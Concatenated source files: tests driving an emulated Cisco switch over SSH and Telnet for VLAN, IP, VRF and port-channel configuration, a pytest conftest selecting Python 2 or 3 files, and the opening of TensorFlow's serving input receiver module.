assert_interface_configuration(t, 'Port-channel1', [
"interface Port-channel1",
" description HELLO",
" switchport trunk encapsulation dot1q",
" switchport trunk native vlan 998",
" switchport trunk allowed vlan 6,4087-4089,4091,4093",
" switchport mode trunk",
"end"
])
t.write("show etherchannel summary")
t.readln("Flags: D - down P - bundled in port-channel")
t.readln(" I - stand-alone s - suspended")
t.readln(" H - Hot-standby (LACP only)")
t.readln(" R - Layer3 S - Layer2")
t.readln(" U - in use f - failed to allocate aggregator")
t.readln("")
t.readln(" M - not in use, minimum links not met")
t.readln(" u - unsuitable for bundling")
t.readln(" w - waiting to be aggregated")
t.readln(" d - default port")
t.readln("")
t.readln("")
t.readln("Number of channel-groups in use: 1")
t.readln("Number of aggregators: 1")
t.readln("")
t.readln("Group Port-channel Protocol Ports")
t.readln("------+-------------+-----------+-----------------------------------------------")
t.readln("1 Po1(S) LACP ")
t.readln("")
t.read("my_switch#")
configuring(t, do="no interface port-channel 1")
t.write("show run int po1")
t.readln("\s*\^", regex=True)
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch#")
@with_protocol
def test_port_channel_is_automatically_created_when_adding_a_port_to_it(self, t):
enable(t)
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface FastEthernet0/1")
t.read("my_switch(config-if)#")
t.write("channel-group 2 mode active")
t.readln("Creating a port-channel interface Port-channel 2")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, 'fa0/1', [
"interface FastEthernet0/1",
" channel-group 2 mode active",
"end"
])
assert_interface_configuration(t, 'po2', [
"interface Port-channel2",
"end"
])
t.write("show etherchannel summary")
t.readln("Flags: D - down P - bundled in port-channel")
t.readln(" I - stand-alone s - suspended")
t.readln(" H - Hot-standby (LACP only)")
t.readln(" R - Layer3 S - Layer2")
t.readln(" U - in use f - failed to allocate aggregator")
t.readln("")
t.readln(" M - not in use, minimum links not met")
t.readln(" u - unsuitable for bundling")
t.readln(" w - waiting to be aggregated")
t.readln(" d - default port")
t.readln("")
t.readln("")
t.readln("Number of channel-groups in use: 1")
t.readln("Number of aggregators: 1")
t.readln("")
t.readln("Group Port-channel Protocol Ports")
t.readln("------+-------------+-----------+-----------------------------------------------")
t.readln("2 Po2(SU) LACP Fa0/1(P)")
t.readln("")
t.read("my_switch#")
configuring(t, do="no interface port-channel 2")
configuring_interface(t, interface="fa0/1", do="no channel-group 2 mode on")
assert_interface_configuration(t, "fa0/1", [
"interface FastEthernet0/1",
"end"
])
@with_protocol
def test_port_channel_is_not_automatically_created_when_adding_a_port_to_it_if_its_already_created(self, t):
enable(t)
create_port_channel_interface(t, '14')
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface FastEthernet0/1")
t.read("my_switch(config-if)#")
t.write("channel-group 14 mode active")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "fa0/1", [
"interface FastEthernet0/1",
" channel-group 14 mode active",
"end"
])
configuring_interface(t, interface="fa0/1", do="no channel-group 14 mode on")
assert_interface_configuration(t, "fa0/1", [
"interface FastEthernet0/1",
"end"
])
configuring(t, do="no interface port-channel 14")
@with_protocol
def test_setting_secondary_ips(self, t):
enable(t)
create_interface_vlan(t, "2999")
configuring_interface_vlan(t, "2999", do="description hey ho")
configuring_interface_vlan(t, "2999", do="no ip redirects")
configuring_interface_vlan(t, "2999", do="ip address 1.1.1.1 255.255.255.0")
configuring_interface_vlan(t, "2999", do="ip address 2.2.2.1 255.255.255.0 secondary")
configuring_interface_vlan(t, "2999", do="ip address 4.4.4.1 255.255.255.0 secondary")
configuring_interface_vlan(t, "2999", do="ip address 3.3.3.1 255.255.255.0 secondary")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" description hey ho",
" ip address 2.2.2.1 255.255.255.0 secondary",
" ip address 4.4.4.1 255.255.255.0 secondary",
" ip address 3.3.3.1 255.255.255.0 secondary",
" ip address 1.1.1.1 255.255.255.0",
" no ip redirects",
"end"])
configuring_interface_vlan(t, "2999", do="no ip address")
configuring_interface_vlan(t, "2999", do="ip redirects")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" description hey ho",
" no ip address",
"end"])
configuring(t, do="no interface vlan 2999")
@with_protocol
def test_setting_access_group(self, t):
enable(t)
create_interface_vlan(t, "2999")
configuring_interface_vlan(t, "2999", do="ip access-group SHNITZLE in")
configuring_interface_vlan(t, "2999", do="ip access-group WHIZZLE out")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" ip access-group SHNITZLE in",
" ip access-group WHIZZLE out",
"end"])
configuring_interface_vlan(t, "2999", do="no ip access-group in")
configuring_interface_vlan(t, "2999", do="no ip access-group WHIZZLE out")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring(t, do="no interface vlan 2999")
@with_protocol
def test_removing_ip_address(self, t):
enable(t)
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface vlan2999")
t.read("my_switch(config-if)#")
t.write("ip address 1.1.1.1 255.255.255.0")
t.read("my_switch(config-if)#")
t.write("ip address 2.2.2.2 255.255.255.0 secondary")
t.read("my_switch(config-if)#")
t.write("no ip address 1.1.1.1 255.255.255.0")
t.readln("Must delete secondary before deleting primary")
t.read("my_switch(config-if)#")
t.write("no ip address 2.2.2.2 255.255.255.0 secondary")
t.read("my_switch(config-if)#")
t.write("no ip address 1.1.1.1 255.255.255.0")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring(t, do="no interface vlan 2999")
@with_protocol
def test_show_ip_interface(self, t):
enable(t)
create_vlan(t, "1000")
create_interface_vlan(t, "1000")
create_vlan(t, "2000")
create_vlan(t, "3000")
create_interface_vlan(t, "3000")
configuring_interface_vlan(t, "3000", do="ip address 1.1.1.1 255.255.255.0")
create_interface_vlan(t, "4000")
configuring_interface_vlan(t, "4000", do="ip vrf forwarding DEFAULT-LAN")
configuring_interface_vlan(t, "4000", do="ip address 2.2.2.2 255.255.255.0")
configuring_interface_vlan(t, "4000", do="ip address 4.2.2.2 255.255.255.0 secondary")
configuring_interface_vlan(t, "4000", do="ip address 3.2.2.2 255.255.255.0 secondary")
configuring_interface_vlan(t, "4000", do="ip address 3.2.2.2 255.255.255.128 secondary")
configuring_interface_vlan(t, "4000", do="ip access-group shizzle in")
configuring_interface_vlan(t, "4000", do="ip access-group whizzle out")
t.write("show ip interface")
t.readln("Vlan1000 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("Vlan3000 is down, line protocol is down")
t.readln(" Internet address is 1.1.1.1/24")
t.readln(" Outgoing access list is not set")
t.readln(" Inbound access list is not set")
t.readln("Vlan4000 is down, line protocol is down")
t.readln(" Internet address is 2.2.2.2/24")
t.readln(" Secondary address 4.2.2.2/24")
t.readln(" Secondary address 3.2.2.2/25")
t.readln(" Outgoing access list is whizzle")
t.readln(" Inbound access list is shizzle")
t.readln(" VPN Routing/Forwarding \"DEFAULT-LAN\"")
t.readln("FastEthernet0/1 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/2 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/3 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/4 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/5 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/6 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/7 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/8 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/9 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/10 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/11 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.readln("FastEthernet0/12 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.read("my_switch#")
t.write("show ip interface vlan 4000")
t.readln("Vlan4000 is down, line protocol is down")
t.readln(" Internet address is 2.2.2.2/24")
t.readln(" Secondary address 4.2.2.2/24")
t.readln(" Secondary address 3.2.2.2/25")
t.readln(" Outgoing access list is whizzle")
t.readln(" Inbound access list is shizzle")
t.readln(" VPN Routing/Forwarding \"DEFAULT-LAN\"")
t.read("my_switch#")
t.write("show ip interface vlan1000")
t.readln("Vlan1000 is down, line protocol is down")
t.readln(" Internet protocol processing disabled")
t.read("my_switch#")
configuring(t, do="no interface vlan 1000")
configuring(t, do="no interface vlan 3000")
configuring(t, do="no interface vlan 4000")
remove_vlan(t, "1000")
remove_vlan(t, "2000")
remove_vlan(t, "3000")
@with_protocol
def test_assigning_a_secondary_ip_as_the_primary_removes_it_from_secondary_and_removes_the_primary(self, t):
enable(t)
create_interface_vlan(t, "4000")
configuring_interface_vlan(t, "4000", do="ip address 2.2.2.2 255.255.255.0")
configuring_interface_vlan(t, "4000", do="ip address 4.2.2.2 255.255.255.0 secondary")
configuring_interface_vlan(t, "4000", do="ip address 3.2.2.2 255.255.255.0 secondary")
configuring_interface_vlan(t, "4000", do="ip address 3.2.2.2 255.255.255.128")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" ip address 4.2.2.2 255.255.255.0 secondary",
" ip address 3.2.2.2 255.255.255.128",
"end"])
configuring(t, do="no interface vlan 4000")
@with_protocol
def test_overlapping_ips(self, t):
enable(t)
create_vlan(t, "1000")
create_interface_vlan(t, "1000")
create_vlan(t, "2000")
create_interface_vlan(t, "2000")
configuring_interface_vlan(t, "1000", do="ip address 2.2.2.2 255.255.255.0")
configuring_interface_vlan(t, "1000", do="ip address 3.3.3.3 255.255.255.0 secondary")
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface vlan2000")
t.read("my_switch(config-if)#")
t.write("ip address 2.2.2.75 255.255.255.128")
t.readln("% 2.2.2.0 overlaps with secondary address on Vlan1000")
t.read("my_switch(config-if)#")
t.write("ip address 3.3.3.4 255.255.255.128")
t.readln("% 3.3.3.0 is assigned as a secondary address on Vlan1000")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
configuring(t, do="no interface vlan 2000")
remove_vlan(t, "2000")
configuring(t, do="no interface vlan 1000")
remove_vlan(t, "1000")
@with_protocol
def test_unknown_ip_interface(self, t):
enable(t)
t.write("show ip interface Vlan2345")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch#")
@with_protocol
def test_removing_ip_needs_to_compare_objects_better(self, t):
enable(t)
create_vlan(t, "1000")
create_interface_vlan(t, "1000")
configuring_interface_vlan(t, "1000", do="ip address 1.1.1.1 255.255.255.0")
configuring_interface_vlan(t, "1000", do="ip address 1.1.1.2 255.255.255.0 secondary")
configuring_interface_vlan(t, "1000", do="ip address 1.1.1.3 255.255.255.0 secondary")
configuring_interface_vlan(t, "1000", do="no ip address 1.1.1.3 255.255.255.0 secondary")
t.write("show ip interface vlan 1000")
t.readln("Vlan1000 is down, line protocol is down")
t.readln(" Internet address is 1.1.1.1/24")
t.readln(" Secondary address 1.1.1.2/24")
t.readln(" Outgoing access list is not set")
t.readln(" Inbound access list is not set")
t.read("my_switch#")
configuring(t, do="no interface vlan 1000")
remove_vlan(t, "1000")
@with_protocol
def test_extreme_vlan_range(self, t):
enable(t)
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("vlan -1")
t.readln("Command rejected: Bad VLAN list - character #1 ('-') delimits a VLAN number")
t.readln(" which is out of the range 1..4094.")
t.read("my_switch(config)#")
t.write("vlan 0")
t.readln("Command rejected: Bad VLAN list - character #X (EOL) delimits a VLAN")
t.readln("number which is out of the range 1..4094.")
t.read("my_switch(config)#")
t.write("vlan 1")
t.read("my_switch(config-vlan)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("vlan 4094")
t.read("my_switch(config-vlan)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("no vlan 4094")
t.read("my_switch(config)#")
t.write("vlan 4095")
t.readln("Command rejected: Bad VLAN list - character #X (EOL) delimits a VLAN")
t.readln("number which is out of the range 1..4094.")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
@with_protocol
def test_full_running_config_and_pipe_begin_support(self, t):
enable(t)
create_vlan(t, "1000", name="hello")
create_interface_vlan(t, "1000")
configuring_interface(t, "Fa0/2", do="switchport mode trunk")
configuring_interface(t, "Fa0/2", do="switchport trunk allowed vlan 125")
t.write("show running | beg vlan")
t.readln("vlan 1")
t.readln("!")
t.readln("vlan 1000")
t.readln(" name hello")
t.readln("!")
t.readln("interface FastEthernet0/1")
t.readln("!")
t.readln("interface FastEthernet0/2")
t.readln(" switchport trunk allowed vlan 125")
t.readln(" switchport mode trunk")
t.readln("!")
t.readln("interface FastEthernet0/3")
t.readln("!")
t.readln("interface FastEthernet0/4")
t.readln("!")
t.readln("interface FastEthernet0/5")
t.readln("!")
t.readln("interface FastEthernet0/6")
t.readln("!")
t.readln("interface FastEthernet0/7")
t.readln("!")
t.readln("interface FastEthernet0/8")
t.readln("!")
t.readln("interface FastEthernet0/9")
t.readln("!")
t.readln("interface FastEthernet0/10")
t.readln("!")
t.readln("interface FastEthernet0/11")
t.readln("!")
t.readln("interface FastEthernet0/12")
t.readln("!")
t.readln("interface Vlan1000")
t.readln(" no ip address")
t.readln("!")
t.readln("end")
t.readln("")
t.read("my_switch#")
configuring_interface(t, "Fa0/2", do="no switchport mode trunk")
configuring_interface(t, "Fa0/2", do="no switchport trunk allowed vlan")
configuring(t, do="no interface vlan 1000")
remove_vlan(t, "1000")
@with_protocol
def test_pipe_inc_support(self, t):
enable(t)
create_vlan(t, "1000", name="hello")
t.write("show running | inc vlan")
t.readln("vlan 1")
t.readln("vlan 1000")
t.read("my_switch#")
remove_vlan(t, "1000")
@with_protocol
def test_ip_vrf(self, t):
enable(t)
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("ip vrf SOME-LAN")
t.read("my_switch(config-vrf)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("no ip vrf SOME-LAN")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
@with_protocol
def test_ip_vrf_forwarding(self, t):
enable(t)
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("ip vrf SOME-LAN")
t.read("my_switch(config-vrf)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("interface Fa0/2")
t.read("my_switch(config-if)#")
t.write("ip vrf forwarding NOT-DEFAULT-LAN")
t.readln("% VRF NOT-DEFAULT-LAN not configured.")
t.read("my_switch(config-if)#")
t.write("ip vrf forwarding SOME-LAN")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Fa0/2", [
"interface FastEthernet0/2",
" ip vrf forwarding SOME-LAN",
"end"])
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("no ip vrf SOME-LAN")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Fa0/2", [
"interface FastEthernet0/2",
"end"])
@with_protocol
def test_ip_vrf_default_lan(self, t):
enable(t)
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface Fa0/2")
t.read("my_switch(config-if)#")
t.write("ip vrf forwarding DEFAULT-LAN")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Fa0/2", [
"interface FastEthernet0/2",
" ip vrf forwarding DEFAULT-LAN",
"end"])
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface Fa0/2")
t.read("my_switch(config-if)#")
t.write("no ip vrf forwarding")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Fa0/2", [
"interface FastEthernet0/2",
"end"])
@with_protocol
def test_ip_setting_vrf_forwarding_wipes_ip_addresses(self, t):
enable(t)
create_vlan(t, "4000")
create_interface_vlan(t, "4000")
configuring_interface_vlan(t, "4000", do="ip address 10.10.0.10 255.255.255.0")
configuring_interface_vlan(t, "4000", do="ip address 10.10.1.10 255.255.255.0 secondary")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" ip address 10.10.1.10 255.255.255.0 secondary",
" ip address 10.10.0.10 255.255.255.0",
"end"])
configuring_interface_vlan(t, "4000", do="ip vrf forwarding DEFAULT-LAN")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" ip vrf forwarding DEFAULT-LAN",
" no ip address",
"end"])
configuring(t, do="no interface vlan 4000")
remove_vlan(t, "4000")
@with_protocol
def test_ip_helper(self, t):
enable(t)
create_interface_vlan(t, "4000")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" no ip address",
"end"])
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface vlan 4000")
t.read("my_switch(config-if)#")
t.write("ip helper-address")
t.readln("% Incomplete command.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("ip helper-address 1.1.1")
t.readln("% Incomplete command.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("ip helper-address 1.a.1")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.") # not incomplete
t.readln("")
t.read("my_switch(config-if)#")
t.write("ip helper-address invalid.ip")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("ip helper-address 10.10.0.1 EXTRA INFO")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
configuring_interface_vlan(t, "4000", do="ip helper-address 10.10.10.1")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" no ip address",
" ip helper-address 10.10.10.1",
"end"])
configuring_interface_vlan(t, "4000", do="ip helper-address 10.10.10.1")
configuring_interface_vlan(t, "4000", do="ip helper-address 10.10.10.2")
configuring_interface_vlan(t, "4000", do="ip helper-address 10.10.10.3")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" no ip address",
" ip helper-address 10.10.10.1",
" ip helper-address 10.10.10.2",
" ip helper-address 10.10.10.3",
"end"])
configuring_interface_vlan(t, "4000", do="no ip helper-address 10.10.10.1")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" no ip address",
" ip helper-address 10.10.10.2",
" ip helper-address 10.10.10.3",
"end"])
configuring_interface_vlan(t, "4000", do="no ip helper-address 10.10.10.1")
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface vlan 4000")
t.read("my_switch(config-if)#")
t.write("no ip helper-address 10.10.0.1 EXTRA INFO")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
configuring_interface_vlan(t, "4000", do="no ip helper-address")
assert_interface_configuration(t, "Vlan4000", [
"interface Vlan4000",
" no ip address",
"end"])
configuring(t, do="no interface vlan 4000")
@with_protocol
def test_ip_route(self, t):
enable(t)
configuring(t, do="ip route 1.1.1.0 255.255.255.0 2.2.2.2")
t.write("show ip route static | inc 2.2.2.2")
t.readln("S 1.1.1.0 [x/y] via 2.2.2.2")
t.read("my_switch#")
t.write("show running | inc 2.2.2.2")
t.readln("ip route 1.1.1.0 255.255.255.0 2.2.2.2")
t.read("my_switch#")
configuring(t, do="no ip route 1.1.1.0 255.255.255.0 2.2.2.2")
t.write("show ip route static")
t.readln("")
t.read("my_switch#")
t.write("exit")
@with_protocol
def test_write_memory(self, t):
enable(t)
t.write("write memory")
t.readln("Building configuration...")
t.readln("OK")
t.read("my_switch#")
@with_protocol
def test_show_version(self, t):
enable(t)
t.write("show version")
t.readln("Cisco IOS Software, C3750 Software (C3750-IPSERVICESK9-M), Version 12.2(58)SE2, RELEASE SOFTWARE (fc1)")
t.readln("Technical Support: http://www.cisco.com/techsupport")
t.readln("Copyright (c) 1986-2011 by Cisco Systems, Inc.")
t.readln("Compiled Thu 21-Jul-11 01:53 by prod_rel_team")
t.readln("")
t.readln("ROM: Bootstrap program is C3750 boot loader")
t.readln("BOOTLDR: C3750 Boot Loader (C3750-HBOOT-M) Version 12.2(44)SE5, RELEASE SOFTWARE (fc1)")
t.readln("")
t.readln("my_switch uptime is 1 year, 18 weeks, 5 days, 1 hour, 11 minutes")
t.readln("System returned to ROM by power-on")
t.readln("System image file is \"flash:c3750-ipservicesk9-mz.122-58.SE2.bin\"")
t.readln("")
t.readln("")
t.readln("This product contains cryptographic features and is subject to United")
t.readln("States and local country laws governing import, export, transfer and")
t.readln("use. Delivery of Cisco cryptographic products does not imply")
t.readln("third-party authority to import, export, distribute or use encryption.")
t.readln("Importers, exporters, distributors and users are responsible for")
t.readln("compliance with U.S. and local country laws. By using this product you")
t.readln("agree to comply with applicable laws and regulations. If you are unable")
t.readln("to comply with U.S. and local laws, return this product immediately.")
t.readln("")
t.readln("A summary of U.S. laws governing Cisco cryptographic products may be found at:")
t.readln("http://www.cisco.com/wwl/export/crypto/tool/stqrg.html")
t.readln("")
t.readln("If you require further assistance please contact us by sending email to")
t.readln("export@cisco.com.")
t.readln("")
t.readln("cisco WS-C3750G-24TS-1U (PowerPC405) processor (revision H0) with 131072K bytes of memory.")
t.readln("Processor board ID FOC1530X2F7")
t.readln("Last reset from power-on")
t.readln("0 Virtual Ethernet interfaces")
t.readln("12 Gigabit Ethernet interfaces")
t.readln("The password-recovery mechanism is enabled.")
t.readln("")
t.readln("512K bytes of flash-simulated non-volatile configuration memory.")
t.readln("Base ethernet MAC Address : 00:00:00:00:00:00")
t.readln("Motherboard assembly number : 73-10219-09")
t.readln("Power supply part number : 341-0098-02")
t.readln("Motherboard serial number : FOC153019Z6")
t.readln("Power supply serial number : ALD153000BB")
t.readln("Model revision number : H0")
t.readln("Motherboard revision number : A0")
t.readln("Model number : WS-C3750G-24TS-S1U")
t.readln("System serial number : FOC1530X2F7")
t.readln("Top Assembly Part Number : 800-26859-03")
t.readln("Top Assembly Revision Number : C0")
t.readln("Version ID : V05")
t.readln("CLEI Code Number : COMB600BRA")
t.readln("Hardware Board Revision Number : 0x09")
t.readln("")
t.readln("")
t.readln("Switch Ports Model SW Version SW Image")
t.readln("------ ----- ----- ---------- ----------")
t.readln("* 1 12 WS-C3750G-24TS-1U 12.2(58)SE2 C3750-IPSERVICESK9-M")
t.readln("")
t.readln("")
t.readln("Configuration register is 0xF")
t.readln("")
t.read("my_switch#")
@with_protocol
def test_reset_port(self, t):
enable(t)
configuring_interface(t, "FastEthernet0/3", do="description shizzle the whizzle and drizzle with lizzle")
configuring_interface(t, "FastEthernet0/3", do="shutdown")
set_interface_on_vlan(t, "FastEthernet0/3", "123")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" description shizzle the whizzle and drizzle with lizzle",
" switchport access vlan 123",
" switchport mode access",
" shutdown",
"end"])
configuring(t, "default interface FastEthernet0/3")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
"end"])
@with_protocol
def test_reset_port_invalid_interface_fails(self, t):
enable(t)
configuring_interface(t, "FastEthernet0/3", do="description shizzle the whizzle and drizzle with lizzle")
t.write("conf t")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("default interface WrongInterfaceName0/3")
t.readln("\s*\^", regex=True)
t.readln("% Invalid input detected at '^' marker (not such interface)")
t.readln("")
t.read("my_switch(config)#")
configuring(t, "default interface FastEthernet0/3")
@with_protocol
def test_standby_version(self, t):
enable(t)
create_vlan(t, "2999")
create_interface_vlan(t, "2999")
configuring_interface_vlan(t, "2999", do='standby version 2')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
" standby version 2",
"end"])
configuring_interface_vlan(t, "2999", do='no standby version 2')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring_interface_vlan(t, "2999", do='standby version 2')
configuring_interface_vlan(t, "2999", do='standby version 1')
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
t.write("configure terminal")
t.readln("Enter configuration commands, one per line. End with CNTL/Z.")
t.read("my_switch(config)#")
t.write("interface vlan 2999")
t.read("my_switch(config-if)#")
t.write("standby version")
t.readln("% Incomplete command.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("standby version 3")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("standby version 2 2")
t.readln(" ^")
t.readln("% Invalid input detected at '^' marker.")
t.readln("")
t.read("my_switch(config-if)#")
t.write("exit")
t.read("my_switch(config)#")
t.write("exit")
t.read("my_switch#")
assert_interface_configuration(t, "Vlan2999", [
"interface Vlan2999",
" no ip address",
"end"])
configuring(t, do="no interface vlan 2999")
remove_vlan(t, "2999")
@with_protocol
def test_disable_ntp(self, t):
enable(t)
configuring_interface(t, "FastEthernet 0/3", do="ntp disable")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
" ntp disable",
"end"])
configuring_interface(t, "FastEthernet 0/3", do="no ntp disable")
assert_interface_configuration(t, "FastEthernet0/3", [
"interface FastEthernet0/3",
"end"])
class TestCiscoSwitchProtocolSSH(TestCiscoSwitchProtocol):
__test__ = True
tester_class = SshTester
class TestCiscoSwitchProtocolTelnet(TestCiscoSwitchProtocol):
__test__ = True
tester_class = TelnetTester
| internap/fake-switches | tests/cisco/test_cisco_switch_protocol.py | Python | apache-2.0 | 58,284 | 0.002316 |
# -*- coding: utf-8 -*-
import sys
import pytest
py3 = sys.version_info[0] >= 3
class DummyCollector(pytest.collect.File):
def collect(self):
return []
def pytest_pycollect_makemodule(path, parent):
bn = path.basename
if "py3" in bn and not py3 or ("py2" in bn and py3):
return DummyCollector(path, parent=parent)
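# Illustrative sketch (not part of the original conftest): a tiny helper that
# restates the collection rule above so it can be exercised directly. The
# helper name is an invention for this example.
def _example_should_skip(basename, running_py3=py3):
    """Return True when a file of this name would be handed to DummyCollector."""
    return ("py3" in basename and not running_py3) or ("py2" in basename and running_py3)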
| cloudera/hue | desktop/core/ext-py/pytest-4.6.11/doc/en/example/py2py3/conftest.py | Python | apache-2.0 | 348 | 0 |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Configuration and utilities for receiving inputs at serving time."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import time
import six
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.util import compat
_SINGLE_FEATURE_DEFAULT_NAME = 'feature'
_SINGLE_RECEIVER_DEFAULT_NAME = 'input'
class ServingInputReceiver(collections.namedtuple(
'ServingInputReceiver',
['features', 'receiver_tensors', 'receiver_tensors_alternatives'])):
"""A return type for a serving_input_receiver_fn.
The expected return values are:
features: A `Tensor`, `SparseTensor`, or dict of string to `Tensor` or
`SparseTensor`, specifying the features to be passed to the model.
receiver_tensors: a `Tensor`, or a dict of string to `Tensor`, specifying
input nodes where this receiver expects to be fed by default. Typically,
this is a single placeholder expecting serialized `tf.Example` protos.
receiver_tensors_alternatives: a dict of string to additional
groups of receiver tensors, each of which may be a `Tensor` or a dict of
string to `Tensor`. These named receiver tensor alternatives generate
additional serving signatures, which may be used to feed inputs at
 different points within the input receiver subgraph. A typical usage is
to allow feeding raw feature `Tensor`s *downstream* of the
tf.parse_example() op. Defaults to None.
"""
def __new__(cls, features, receiver_tensors,
receiver_tensors_alternatives=None):
if features is None:
raise ValueError('features must be defined.')
if not isinstance(features, dict):
features = {_SINGLE_FEATURE_DEFAULT_NAME: features}
for name, tensor in features.items():
if not isinstance(name, six.string_types):
raise ValueError('feature keys must be strings: {}.'.format(name))
